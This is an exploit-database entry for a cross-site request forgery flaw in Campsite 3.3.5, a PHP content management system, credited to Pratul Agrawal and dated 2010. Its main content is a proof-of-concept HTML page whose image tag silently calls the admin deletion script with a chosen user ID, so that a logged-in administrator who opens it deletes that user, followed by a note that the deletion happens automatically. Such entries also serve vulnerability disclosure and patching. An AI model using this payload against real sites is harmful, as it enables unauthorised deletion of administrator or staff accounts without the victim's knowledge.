Campsite v3.3.5 CSRF Vulnerability



EDB-ID: 11676 CVE: N/AOSVDB-ID: 62851
Author: Pratul AgrawalPublished: 2010-03-10Verified: Verified
Exploit Code:   DownloadVulnerable App:    Download

Rating

(0.0)
Prev Home Next
                     =======================================================================
                                         campsite 3.3.5 CSRF Vulnerability
                     =======================================================================
                                                     by
                                                Pratul Agrawal
  # Vulnerability found in- Admin module
  # email         Pratulag@yahoo.com
  # company       aksitservices
  # Credit by     Pratul Agrawal
  # Category  	  CMS / Portals
  # Site p4ge     http://wwwcampware.org/
  # Plateform     php
  #  Proof of concept   #
  Targeted URL:  http://server/admin/login.php
  Script to delete the Admin user through Cross Site request forgery
             .  ..................................................................................................................
                        <html>
                          <body>
                           <img src=http://server/admin/users/do_del.php?User=[userID]&uType=Staff />
                          </body>
                        </html>
             .  ..................................................................................................................
  After execution refresh the page and u can see that user having giving ID  get deleted automatically.
#If you have any questions, comments, or concerns, feel free to contact me.






Comments

No comments so far